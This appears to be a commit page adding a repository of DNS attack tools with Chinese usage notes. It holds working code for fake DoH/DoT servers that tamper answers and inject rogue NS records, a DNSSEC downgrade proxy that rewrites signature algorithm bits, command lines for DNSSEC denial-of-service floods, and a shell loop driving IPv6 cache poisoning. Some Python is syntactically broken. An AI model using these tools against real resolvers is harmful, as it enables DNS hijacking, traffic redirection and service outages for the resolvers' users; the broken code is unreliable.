summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
author“shihaoyue” <“[email protected]”>2024-09-30 15:52:30 +0800
committer“shihaoyue” <“[email protected]”>2024-09-30 15:52:30 +0800
commit96107bbdcdb1236425ce589bd15980d6ebab4d50 (patch)
treea910d540f26402e05dfdcc076eee14d36eb04455
parent0c6dfbed508d6d4044c465c416cdb9e48ede5f69 (diff)
first commit
Diffstat
-rw-r--r--10_doh_injection/DoH数据注入.pdfbin0 -> 190217 bytes
-rw-r--r--10_doh_injection/fake_DoH.py63
-rw-r--r--11_dot_injection/DoT数据注入.pdfbin0 -> 187132 bytes
-rw-r--r--11_dot_injection/dot_stub.py45
-rw-r--r--11_dot_injection/fake_DoT.py63
-rwxr-xr-x12_TargetGZ/TargetGZ_Clientbin0 -> 11702656 bytes
-rw-r--r--12_TargetGZ/fpdns_clientbin0 -> 8183443 bytes
-rw-r--r--12_TargetGZ/fpdns_serverbin0 -> 12494479 bytes
-rw-r--r--12_TargetGZ/topology.pngbin0 -> 406448 bytes
-rw-r--r--12_TargetGZ/说明.md66
-rw-r--r--12_TargetGZ/请删除我.txt0
-rw-r--r--1_dnssec_ddos/ddos-topology.pngbin0 -> 461209 bytes
-rwxr-xr-x1_dnssec_ddos/dtoolbin0 -> 9702192 bytes
-rwxr-xr-x1_dnssec_ddos/rogue-nsbin0 -> 6652077 bytes
-rw-r--r--1_dnssec_ddos/说明.md73
-rw-r--r--2_dnssec_Downgrade/downgrade-topology.pngbin0 -> 37160 bytes
-rw-r--r--2_dnssec_Downgrade/proxy.py196
-rw-r--r--2_dnssec_Downgrade/说明.md52
m---------3_v6_DDoS/code0
-rw-r--r--3_v6_DDoS/说明文档.docxbin0 -> 275082 bytes
-rw-r--r--4_v6_injection/Readme.md3
-rwxr-xr-x4_v6_injection/attack.sh55
-rw-r--r--4_v6_injection/dns.binbin0 -> 46 bytes
-rw-r--r--4_v6_injection/dns_OPT.binbin0 -> 11 bytes
-rw-r--r--4_v6_injection/dns_end.binbin0 -> 5 bytes
-rw-r--r--4_v6_injection/dns_mid.bin1
-rwxr-xr-x4_v6_injection/dns_query.sh50
-rw-r--r--4_v6_injection/dns_start.binbin0 -> 10 bytes
-rwxr-xr-x4_v6_injection/fakedns6bin0 -> 8897192 bytes
-rw-r--r--4_v6_injection/fakedns6-演示.zipbin0 -> 6682239 bytes
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/attack.go714
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/dns.go332
-rwxr-xr-x4_v6_injection/src/ucr.edu/fakedns6/fakedns6bin0 -> 8897192 bytes
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/go.mod15
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/go.sum25
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/library.go171
-rw-r--r--4_v6_injection/src/ucr.edu/fakedns6/saddnsbin0 -> 4486008 bytes
-rw-r--r--4_v6_injection/txid.bin1
-rw-r--r--4_v6_injection/说明文档.docxbin0 -> 86446 bytes
-rw-r--r--5_v6_fake/Readme.md3
-rwxr-xr-x5_v6_fake/attack.sh55
-rw-r--r--5_v6_fake/dns.binbin0 -> 42 bytes
-rw-r--r--5_v6_fake/dns_OPT.binbin0 -> 11 bytes
-rw-r--r--5_v6_fake/dns_end.binbin0 -> 5 bytes
-rw-r--r--5_v6_fake/dns_mid.bin1
-rwxr-xr-x5_v6_fake/dns_query.sh50
-rw-r--r--5_v6_fake/dns_start.binbin0 -> 10 bytes
-rwxr-xr-x5_v6_fake/fakedns6bin0 -> 8897192 bytes
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/attack.go714
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/dns.go332
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/go.mod15
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/go.sum25
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/library.go171
-rw-r--r--5_v6_fake/src/ucr.edu/fakedns6/saddnsbin0 -> 4486008 bytes
-rw-r--r--5_v6_fake/txid.bin1
-rw-r--r--5_v6_fake/说明文档.docxbin0 -> 87452 bytes
-rw-r--r--6_dot_DDoS/att_pending_cookie.py127
-rw-r--r--6_dot_DDoS/start_pending.py20
-rw-r--r--6_dot_DDoS/脉冲拒绝服务.pdfbin0 -> 178358 bytes
-rw-r--r--7_doh_DDoS/HTTP2快速重置拒绝服务.pdfbin0 -> 171215 bytes
-rw-r--r--7_doh_DDoS/cve44487.py152
-rw-r--r--7_doh_DDoS/start_reset_att.py26
-rw-r--r--8_doh_fake/DoH数据篡改.pdfbin0 -> 182907 bytes
-rw-r--r--8_doh_fake/fake_DoH.py63
-rw-r--r--9_dot_fake/DoT数据篡改.pdfbin0 -> 182834 bytes
-rw-r--r--9_dot_fake/dot_stub.py45
-rw-r--r--9_dot_fake/fake_DoT.py63
-rwxr-xr-xtest/shuchubin0 -> 2581494 bytes
68 files changed, 3788 insertions, 0 deletions
diff --git a/10_doh_injection/DoH数据注入.pdf b/10_doh_injection/DoH数据注入.pdf
new file mode 100644
index 0000000..803611c
--- /dev/null
+++ b/10_doh_injection/DoH数据注入.pdf
Binary files differ
diff --git a/10_doh_injection/fake_DoH.py b/10_doh_injection/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/10_doh_injection/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+ if request.method == "GET":
+ rquery = str(request.query).split(' ')[1]
+ #print(rquery)
+ rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+ doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+ else:
+ try:
+ doh_request = dns.message.from_wire(await request.read())
+ except :
+ return web.Response(text='Invalid DNS request', status=400)
+
+ dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+ dns_request.id = doh_request.id
+ # 发起DNS请求
+ dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+ #print(dns_response)
+
+ if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+ print('---tamper---',tamper)
+ dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+ if str(doh_request.question[0].name) == inject:
+ print('---inject---',inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+ # 构建HTTPS响应
+ response = web.Response(body=dns_response.to_wire())
+ response.content_type = 'application/dns-message'
+ return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context) \ No newline at end of file
diff --git a/11_dot_injection/DoT数据注入.pdf b/11_dot_injection/DoT数据注入.pdf
new file mode 100644
index 0000000..eec7498
--- /dev/null
+++ b/11_dot_injection/DoT数据注入.pdf
Binary files differ
diff --git a/11_dot_injection/dot_stub.py b/11_dot_injection/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/11_dot_injection/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+ # 接收DNS请求
+ data, addr = listener.recvfrom(1024)
+ #print(dns.message.from_wire(data))
+ data = dns.message.from_wire(data)
+ if 'baidu' in data.question.__str__():
+ # print(data)
+ # print(addr)
+ print('DNS请求:', data.question)
+ # # 创建TLS连接并发送DNS请求到上游服务器
+ resp = dns.query.tls(
+ q=data,
+ where=upstream_server,
+ timeout=10,
+ ssl_context=context)
+ print('DNS响应:', resp.answer)
+ # with socket.create_connection((upstream_server,853)) as sock:
+ # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+ # tls_sock.sendall(data.to_wire())
+ # resp = tls_sock.recv(4096)
+
+ # 将上游服务器的响应发送回客户端
+ listener.sendto(resp.to_wire(), addr)
+ break
diff --git a/11_dot_injection/fake_DoT.py b/11_dot_injection/fake_DoT.py
new file mode 100644
index 0000000..fbf5fea
--- /dev/null
+++ b/11_dot_injection/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server()) \ No newline at end of file
diff --git a/12_TargetGZ/TargetGZ_Client b/12_TargetGZ/TargetGZ_Client
new file mode 100755
index 0000000..1e63395
--- /dev/null
+++ b/12_TargetGZ/TargetGZ_Client
Binary files differ
diff --git a/12_TargetGZ/fpdns_client b/12_TargetGZ/fpdns_client
new file mode 100644
index 0000000..a2c49bb
--- /dev/null
+++ b/12_TargetGZ/fpdns_client
Binary files differ
diff --git a/12_TargetGZ/fpdns_server b/12_TargetGZ/fpdns_server
new file mode 100644
index 0000000..39c6a48
--- /dev/null
+++ b/12_TargetGZ/fpdns_server
Binary files differ
diff --git a/12_TargetGZ/topology.png b/12_TargetGZ/topology.png
new file mode 100644
index 0000000..265d903
--- /dev/null
+++ b/12_TargetGZ/topology.png
Binary files differ
diff --git a/12_TargetGZ/说明.md b/12_TargetGZ/说明.md
new file mode 100644
index 0000000..7fc8847
--- /dev/null
+++ b/12_TargetGZ/说明.md
@@ -0,0 +1,66 @@
+## 使用说明
+
+### 基本目标
+
+通过主动探测精确感知目标DNS服务的各项参数。
+
+### 软件环境
+
+目标感知中共需要3种软件,如下表所示,其中主要测试对象为目录中的目标感知工具fpdns_client和辅助感知工具fpdns_server,BIND9递归解析器作为感知目标。
+
+| 软件名称 | 版本 | 作用 | 备注 |
+| ------- | ---- | ---- | ---- |
+|目标感知工具|v1.0|进行目标感知||
+|辅助感知工具|v1.0|辅助进行目标感知||
+|BIND9|9.11.36|作为感知目标||
+
+### 硬件环境
+
+测试中共需要2台服务器A和B。服务器均为公有云VPS,基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
+
+|硬件名称|数量|配置|作用|
+|---|---|---|---|
+|公有云VPS|2|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
+
+### 测试拓扑
+
+测试拓扑如下图。
+
+![](topology.png)
+
+### 部署方法
+
+#### 感知目标部署
+
+在服务器A上安装BIND9,设置模式为递归解析模式。
+
+#### 目标感知工具部署
+
+将可执行文件fpdns_client移动到服务器A上。
+
+#### 辅助感知工具部署
+
+将可执行文件fpdns_server移动到服务器C上。
+
+### 使用方法
+
+#### 辅助感知工具
+
+|参数|说明|示例|
+|---|---|---|
+|-sld|感知中使用的二级域名|echodns.xyz|
+
+#### 拒绝服务攻击工具
+
+|参数|说明|示例|
+|---|---|---|
+|-target|感知目标的IP地址|1.2.3.4|
+
+
+### 测试方法
+
+1. 在服务器A上启动BIND9递归解析器;
+2. 在服务器B上执行命令`./fpdns_server -sld echodns.xyz`,启动辅助感知工具;
+3. 在服务器A上执行命令`./dtool -target {ip}`,进行目标感知
+4. 等待感知完毕,通过输出结果判断感知效果
+
diff --git a/12_TargetGZ/请删除我.txt b/12_TargetGZ/请删除我.txt
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/12_TargetGZ/请删除我.txt
diff --git a/1_dnssec_ddos/ddos-topology.png b/1_dnssec_ddos/ddos-topology.png
new file mode 100644
index 0000000..846ff8c
--- /dev/null
+++ b/1_dnssec_ddos/ddos-topology.png
Binary files differ
diff --git a/1_dnssec_ddos/dtool b/1_dnssec_ddos/dtool
new file mode 100755
index 0000000..f6479fc
--- /dev/null
+++ b/1_dnssec_ddos/dtool
Binary files differ
diff --git a/1_dnssec_ddos/rogue-ns b/1_dnssec_ddos/rogue-ns
new file mode 100755
index 0000000..b01aec9
--- /dev/null
+++ b/1_dnssec_ddos/rogue-ns
Binary files differ
diff --git a/1_dnssec_ddos/说明.md b/1_dnssec_ddos/说明.md
new file mode 100644
index 0000000..e385ad7
--- /dev/null
+++ b/1_dnssec_ddos/说明.md
@@ -0,0 +1,73 @@
+## 使用说明
+
+### 基本目标
+
+通过向目标域名解析服务器发送特定请求,使目标服务器服务质量下降或无法提供服务,形成拒绝服务攻击。
+
+### 软件环境
+
+DNSSEC拒绝服务攻击中共需要4种软件,如下表所示,其中主要测试对象为目录中的拒绝服务攻击工具dtool和辅助攻击工具rogue-ns,dig工具用于从客户端发起DNS查询并查看解析结果,docker用于运行必要的DNS服务器和监控组件容器。
+
+| 软件名称 | 版本 | 作用 | 备注 |
+| ------- | ---- | ---- | ---- |
+|拒绝服务攻击工具|v1.0|发送拒绝服务攻击请求||
+|辅助攻击工具|v1.0|辅助进行拒绝服务攻击||
+|dig|9.11.36|发起DNS查询并查看解析结果||
+|docker|24.0.5|安装必要容器||
+
+### 硬件环境
+
+测试中共需要三台服务器A,B和C。服务器均为公有云VPS,基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
+
+|硬件名称|数量|配置|作用|
+|---|---|---|---|
+|公有云VPS|3|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
+
+### 测试拓扑
+
+测试拓扑如下图。
+
+![](ddos-topology.png)
+
+### 部署方法
+
+#### 目标及监控部署
+
+在服务器B上通过docker安装BIND9容器作为攻击目标,安装cadvisor,prometheus和grafana进行服务器B的状态监控。
+
+#### 拒绝服务攻击工具部署
+
+将可执行文件dtool移动到服务器A上。
+
+#### 辅助攻击工具部署
+
+将可执行文件rogue-ns移动到服务器C上。
+
+### 使用方法
+
+#### 辅助攻击工具
+
+|参数|说明|示例|
+|---|---|---|
+|-sld|攻击中使用的二级域名|echodns.xyz|
+
+#### 拒绝服务攻击工具
+
+|参数|说明|示例|
+|---|---|---|
+|query|攻击中使用的二级域名|echodns.xyz|
+|-p|目标端口|53|
+|-d|攻击中使用的域名后缀|rogue.echodns.xyz|
+|-R|是否进行域名随机生成,布尔型参数||
+|-r|发送请求速率|100|
+|-n|发送请求总量|10000|
+
+
+### 测试方法
+
+1. 在服务器B上启动BIND9容器;
+2. 在服务器C上执行命令`./rogue-ns -sld echodns.xyz`,启动辅助攻击工具;
+3. 在服务器A上执行命令`./dtool query {ip} -p 5353 -R -d rogue.jtfgzlm.icu -r 300 -n 60000`,启动拒绝服务攻击脚本向目标进行攻击;
+4. 通过服务器B上3000端口的grafana仪表盘监控目标状态;
+5. 在服务器A上使用dig向目标进行DNS查询,通过解析时延和超时情况判断攻击效果。
+
diff --git a/2_dnssec_Downgrade/downgrade-topology.png b/2_dnssec_Downgrade/downgrade-topology.png
new file mode 100644
index 0000000..4198831
--- /dev/null
+++ b/2_dnssec_Downgrade/downgrade-topology.png
Binary files differ
diff --git a/2_dnssec_Downgrade/proxy.py b/2_dnssec_Downgrade/proxy.py
new file mode 100644
index 0000000..8b7b7cf
--- /dev/null
+++ b/2_dnssec_Downgrade/proxy.py
@@ -0,0 +1,196 @@
+# -*- coding: utf-8 -*-
+
+import socket
+import dns.message
+import dns.rdatatype
+import dns.rdata
+import dns.rdataclass
+import binascii
+import csv
+import datetime
+
+from scapy.all import *
+
+#from crypto.PublicKey import Ed448
+#import dns.rdatatype
+
+# 定义代理服务器的地址和端口
+proxy_host = '10.0.8.14' # 代理服务器的IP地址
+proxy_port = 53 # 代理服务器的端口
+#proxy_port = 22 # 代理服务器的端口
+
+# 定义上游DNS服务器的地址和端口
+upstream_host = '127.0.0.1' # 上游DNS服务器的IP地址
+upstream_port = 9999 # 上游DNS服务器的端口
+
+csv_file = "dnssec_log.csv"
+
+def proxy_dns_request(request, client_addr, proxy_socket):
+ # 创建与上游DNS服务器的套接字连接
+ upstream_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+
+ # 发送DNS请求到上游DNS服务器
+ upstream_socket.sendto(request, (upstream_host, upstream_port))
+
+ # 接收上游DNS服务器的响应
+ response, _ = upstream_socket.recvfrom(4096)
+
+ # 修改DNS应答中的字段
+ modified_response = modify_dns_response(response,client_addr,len(request))
+ #modified_response = response
+
+ # 将修改后的DNS应答发送给客户端
+ #client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ #client_socket.sendto(modified_response, client_addr)
+ proxy_socket.sendto(modified_response, client_addr)
+ # print("finish",client_addr)
+ # 关闭套接字连接
+ upstream_socket.close()
+ #client_socket.close()
+
+def modify_dns_response(response,client_addr,len_request):
+ # 在这里添加你的修改逻辑
+ # 解析DNS应答消息,并修改需要的字段
+ # 可以使用dnspython等DNS库来解析和构造DNS消息
+ # print("response ",response)
+ dns_response = dns.message.from_wire(response)
+ # print("dns_response ",dns_response)
+ qweasd = 0
+
+ packet = DNS(response)
+ # 解析DNS流量
+ if DNS in packet:
+ dns1 = packet[DNS]
+ if dns1.qd[0].qtype != 1:
+ print("************No Change************")
+ return response
+ if dns1.ancount > 0:
+ print("Answers:")
+ for an in dns1.an:
+ print(" Name:", an.rrname.decode())
+ print(" Type:", an.type)
+ #print(" Data:", an.rdata)
+
+ for rrset in dns_response.answer:
+ if rrset.rdtype == dns.rdatatype.RRSIG and qweasd == 0 :
+ qweasd = 1
+ current_time = datetime.now()
+ # with open(csv_file, "a", newline="") as file:
+ # writer = csv.writer(file)
+ # writer.writerow([client_addr, len_request, current_time])
+ # print("dnssec_log.csv:",csv_file)
+ # new_rdata = dns.rdata.from_text(rrset.rdclass, rrset.rdtype, rrset.to_text())
+ # new_rdata.algorithm = 16 # 设置为 5 或其他你想要的值
+
+ # 替换原始 RRSIG 记录
+ # rrset.clear()
+ # rrset.add(new_rdata)
+ # for attrr in dir(rrset):
+ # print(attrr)
+# print("rdata.algorithm",rrset.algorithm)
+ # new_rdata = dns.rdatatype.from_text(rdtype_text.replace(dns.rdatatype.RSASHA1,dns.rdatatype.ED448))
+ # rrset.items = new_rdata
+ # print(rrset.items)
+ # print(rrset[1])
+# print(bin(rrset.items[1]))
+ # for qwe in rrset:
+ #print(qwe)
+ #print(type(qwe)," key: ",qwe," qweqweqweqweqwe ")
+ # for attrr in dir(qwe):
+ # print(attrr)
+ # qwe.algorithm = 16
+ # print(qwe.algorithm)
+ # 遍历DNS响应中的资源记录
+
+ modified_response = dns_response.to_wire()
+ binary_string = bin(int(binascii.hexlify(modified_response), 16))
+ # print("len: ",len(binary_string),"\n",binary_string)
+ formatted_string = str(binary_string)
+ index = str(binary_string).find("01100101001000001101110000001111")
+ new_string = formatted_string[:index+1] + '0' + formatted_string[index+2:]
+ new_string = new_string[:index+2] + '1' + new_string[index+3:]
+ new_string = new_string[:index+3] + '0' + new_string[index+4:]
+ new_string = new_string[:index+4] + '0' + new_string[index+5:]
+ new_string = new_string[:index+5] + '1' + new_string[index+6:]
+ new_string = new_string[:index+6] + '0' + new_string[index+7:]
+ formatted_string = new_string[:index+7] + '1' + new_string[index+8:]
+
+ # index = str(binary_string).find("0000010100000011")
+ index = str(binary_string).find("0000110100000011")
+
+# formatted_string = str(binary_string)
+ new_string = formatted_string[:index+1] + '1' + formatted_string[index+2:]
+ new_string = new_string[:index+2] + '1' + new_string[index+3:]
+ new_string = new_string[:index+3] + '1' + new_string[index+4:]
+ new_string = new_string[:index+4] + '0' + new_string[index+5:]
+ new_string = new_string[:index+5] + '0' + new_string[index+6:]
+ new_string = new_string[:index+6] + '0' + new_string[index+7:]
+ formatted_string = new_string[:index+7] + '0' + new_string[index+8:]
+ # print("len: ",len(formatted_string),"\n",formatted_string)
+ # print("index: ",formatted_string[index:])
+ binary_string = formatted_string[2:]
+ binary_number = int(binary_string, 2)
+ formatted_string = binary_number.to_bytes((binary_number.bit_length() + 7) // 8, 'big')
+ # print("index: ",formatted_string)
+ try:
+ dns_response = dns.message.from_wire(formatted_string)
+ except:
+ modified_response = dns_response.to_wire()
+ # print(dns_response)
+ modified_response = dns_response.to_wire()
+ print("**********************************************************************************************************************")
+ return modified_response
+
+def start_proxy_server():
+ # 创建代理服务器的套接字
+ proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+
+ # 将套接字绑定到代理服务器的地址和端口
+ proxy_socket.bind((proxy_host, proxy_port))
+
+ # 循环监听客户端请求并代理流量
+
+ num = 1
+
+ print("START: ")
+ while True:
+
+ print("start")
+ request, client_addr = proxy_socket.recvfrom(4096)
+ print("num: ",num)
+ num = num + 1
+ try:
+ packet = DNS(request)
+ # 解析DNS流量
+ if DNS in packet:
+ dns1 = packet[DNS]
+ if dns1.qdcount > 0:
+ print("Queries:")
+ for qd in dns1.qd:
+ print(" Query Name:", qd.qname.decode())
+ print(" Query Type:", qd.qtype)
+ print(" Query Class:", qd.qclass)
+ query_current_time = datetime.now()
+ query_current_time = query_current_time.strftime("%H%M%S%f")[:-2]
+ # src = request[IP].src
+ print(" Query src:", client_addr)
+ print(" Query Current Time:", query_current_time)
+ tmp = qd.qname.decode()
+ if tmp[0] == "D":
+ with open("shiyan1_query", "a", newline="") as file:
+ writer = csv.writer(file)
+ writer.writerow([qd.qname.decode(), qd.qtype, qd.qclass, client_addr, query_current_time])
+ print("finish")
+ except Exception as e:
+ print("error",str(e))
+
+
+
+ proxy_dns_request(request, client_addr, proxy_socket)
+
+ # 关闭套接字连接
+ proxy_socket.close()
+
+
+# 启动代理服务器
+start_proxy_server()
diff --git a/2_dnssec_Downgrade/说明.md b/2_dnssec_Downgrade/说明.md
new file mode 100644
index 0000000..538b7db
--- /dev/null
+++ b/2_dnssec_Downgrade/说明.md
@@ -0,0 +1,52 @@
+## 使用说明
+
+### 基本目标
+
+使目标DNS解析器不对DNSSEC记录进行验证,实现针对DNSSEC的降级攻击
+
+### 软件环境
+
+DNSSEC降级攻击中共需要四种软件,如下表所示,其中主要测试对象为目录中的DNSSEC绕过工具脚本proxy.py,BIND9用于搭建权威服务器和递归解析器,dig工具用于从客户端发起DNS查询并查看解析结果,python用于运行DNSSEC绕过工具。
+
+| 软件名称 | 版本 | 作用 | 备注 |
+| ------- | ---- | ---- | ---- |
+|DNSSEC绕过工具|v1.0|实现中间人篡改功能|proxy.py|
+|BIND9|9.18.2|搭建权威服务器和递归解析器||
+|dig|9.11.36|发起DNS查询并查看解析结果||
+|python|3.7.2|运行DNSSEC绕过工具||
+
+### 硬件环境
+
+测试中共需要三台服务器A和B。服务器A和B均为公有云VPS,基本配置为Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存。
+
+|硬件名称|数量|配置|作用|
+|---|---|---|---|
+|公有云VPS|2|Intel(R) Xeon(R) Platinum 8269CY CPU双核4GB内存|安装运行必要软件|
+
+### 测试拓扑
+
+测试拓扑如下图。
+
+![拓扑](downgrade-topology.png)
+
+### 部署方法
+
+#### BIND9部署
+
+在服务器B上安装并配置BIND9作为权威服务器,并进行权威域的DNSSEC配置。
+在服务器A上安装并配置BIND9作为递归解析器,开启DNSSEC验证功能。
+
+#### DNSSEC绕过工具部署
+
+在服务器B上安装python3,将proxy.py脚本移动到服务器上。
+
+### 工具使用方法
+
+DNSSEC绕过工具无输入参数,直接通过`python3 proxy.py`运行。
+
+### 测试方法
+
+1. 在服务器B上启动权威服务器,监听9999端口;
+2. 在服务器B上执行python3 proxy.py命令,启动DNSSEC绕过工具;
+3. 在服务器A上使用dig向本地的递归解析器查询ns3.jtfgzlm.icu,通过解析结果验证DNSSEC降级攻击效果
+
diff --git a/3_v6_DDoS/code b/3_v6_DDoS/code
new file mode 160000
+Subproject 25c66e87271cf020e3c7e2767c42ab49aca935d
diff --git a/3_v6_DDoS/说明文档.docx b/3_v6_DDoS/说明文档.docx
new file mode 100644
index 0000000..8c41fa7
--- /dev/null
+++ b/3_v6_DDoS/说明文档.docx
Binary files differ
diff --git a/4_v6_injection/Readme.md b/4_v6_injection/Readme.md
new file mode 100644
index 0000000..722e1dc
--- /dev/null
+++ b/4_v6_injection/Readme.md
@@ -0,0 +1,3 @@
+## 使用说明
+
+./attack.sh 【目标解析器IP】【想要将AAAA记录修改指向的IPv6地址】 【发包网口(例如eth0)】 【目标域名】【目标权威服务地址】
diff --git a/4_v6_injection/attack.sh b/4_v6_injection/attack.sh
new file mode 100755
index 0000000..9d63572
--- /dev/null
+++ b/4_v6_injection/attack.sh
@@ -0,0 +1,55 @@
+#!/bin/bash
+# This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
+# $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
+# Please run with sudo.
+
+# Verify the existing record domain, just for proof purposes.
+echo '获取原记录中:'
+dig @$1 $4 AAAA
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+
+var=0
+num=0
+success=0
+while [ $success -ne 1 ]
+do
+ success=0
+ echo "等待缓存过期,$sleeptime秒之后开始攻击..."
+ sleep $sleeptime
+ echo "开始攻击"
+ # flood
+ echo "攻击参数:"
+ echo "目标域名权威服务地址:$5"
+ echo "目标解析服务地址:$1"
+ echo "目标域名:$4"
+ ret=$(./dns_query.sh $1 $2 $3 $4)
+ #echo "ret:$ret"
+ echo "初始化工具环境"
+ sleep 1
+ echo "尝试触发权威服务器请求速率限制"
+ sleep 3
+ FINAL=`echo ${ret: -1}`
+ #echo "fin:$FINAL"
+ # Start attack
+ # Change the argument accordingly
+ echo "执行侧信道攻击脚本中"
+ ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ # a - 进行域名缓存投毒的权威服务器
+ # b -
+ sleep 30
+ # Validations
+ ((var++))
+ echo "第$var轮次攻击结束"
+ dig @$1 $4 AAAA
+ if [ "$FINAL" == "0" ];then
+ success=1
+ sleeptime=0
+ fi
+ echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+done
+# success
+echo '检测到攻击成功实现'
+echo '等待两秒,再次请求...'
+sleep 2
+dig @$1 $4 AAAA
+echo '攻击已完成!!!!'
diff --git a/4_v6_injection/dns.bin b/4_v6_injection/dns.bin
new file mode 100644
